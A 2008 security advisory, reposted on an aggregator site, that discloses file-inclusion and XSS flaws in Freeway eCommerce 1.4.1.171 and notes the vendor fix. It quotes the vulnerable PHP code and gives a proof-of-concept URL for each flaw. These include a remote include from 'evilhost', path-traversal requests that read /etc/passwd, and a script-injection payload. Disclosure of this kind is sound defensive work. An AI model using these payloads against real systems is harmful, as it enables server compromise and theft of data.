|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 4181 CVE : CVE-2008-3769 CVE : CVE-2008-3770 CVE : CVE-2008-3841 CWE : CWE-94 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Given : Yes Credit : DSecRG Published : 26.08.2008
Advisory Text : Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036 Application: Freeway eCommerce Versions Affected: 1.4.1.171 Vendor URL: http://www.openfreeway.org/ Bugs: RFI, Multiple LFI, XSS Exploits: YES Reported: 27.06.2008 Second report: 04.07.2008 Vendor response: 06.07.2008 Solution: YES Date of Public Advisory: 18.08.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Freeway eCommerce system has multiple security vulnerabilities: 1. Multiple Remote/Local File Include 2. Linked XSS vulnerability Details ******* 1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities. 1.1 Remote File Include vulnerability found in script admin/create_order_new.php Vulnerable GET parameter "include_page". Code **** ################################################# ... $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['comma nd']:''; ... if($command!="") { switch($command){ ... case 'include_page': require($HTTP_GET_VARS['include_page']); break; ... ################################################# Example: http://[server]/[installdir]/admin/create_order_new.php?command=include_ page&include_page=http://evilhost/info.php 1.2 Local File Include vulnerability found in script includes/events_application_top.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL); ################################################# Example: http://[server]/[installdir]/includes/events_application_top.php?languag e=../../../../../../../../../../../../../etc/passwd%00 1.3 Local File Include vulnerabilities found in scripts includes/languages/english/account.php includes/languages/french/account.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . "/events_account.php"); ################################################# Example: http://[server]/[installdir]/includes/languages/english/account.php?lang uage=../../../../../../../../../../../../../etc/passwd%00 1.4 Local File Include vulnerability found in script includes/languages/french/account_newsletters.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . "/events_account_newsletters.php"); ################################################# Example: http://[server]/[installdir]/includes/languages/french/account_newslette rs.php?language=../../../../../../../../../../../../../etc/passwd%00 1.5 Local File Include vulnerability found in script includes/modules/faqdesk/faqdesk_article_require.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# //require('includes/application_top.php'); require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE); ################################################# Example: http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_re quire.php?language=../../../../../../../../../../../../../etc/passwd%00 1.6 Local File Include vulnerability found in script includes/modules/newsdesk/newsdesk_article_require.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# //require('includes/application_top.php'); require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE); ################################################# Example: http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_ require.php?language=../../../../../../../../../../../../../etc/passwd%0 0 1.7 Local File Include vulnerability found in script templates/Freeway/boxes/card1.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . '/cards1_box.php'); ################################################# Example: http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language= ../../../../../../../../../../../../../etc/passwd%00 1.8 Local File Include vulnerability found in script templates/Freeway/boxes/loginbox.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . '/loginbox.php'); ################################################# Example: http://[server]/[installdir]/templates/Freeway/boxes/loginbox.php?langua ge=../../../../../../../../../../../../../etc/passwd%00 1.9 Local File Include vulnerability found in script templates/Freeway/boxes/whos_online.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# require(DIR_WS_LANGUAGES . $language . '/whos_onlinebox.php'); ################################################# Example: http://[server]/[installdir]/templates/Freeway/boxes/whos_online.php?lan guage=../../../../../../../../../../../../../etc/passwd%00 1.10 Local File Include vulnerability found in script templates/Freeway/mainpage_modules/mainpage.php Successful exploitation requires that "register_globals" is enabled. Code **** ################################################# include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFINE_MAINPAGE); ################################################# Example: http://[server]/[installdir]/templates/Freeway/mainpage_modules/mainpage .php?language=../../../../../../../../../../../../../etc/passwd%00 --------------------------------------------------------------------- 2. Linked XSS vulnerability found in script admin/search_links.php GET parameter "search_link" Example: http://[server]/[installdir]/admin/search_links.php?search_link="<script >a=/DSecRG_XSS/%0d%0aalert(a.source)</script> Solution ******** Vendor fix this flaw on 13.08.2008. New version of Freeway 1.4.2.197 [Sathish] can be download here: http://www.openfreeway.org/download.html Change Log: http://www.openfreeway.org/download/change-log.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) References : http://www.openfreeway.org/download/change-log.html Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |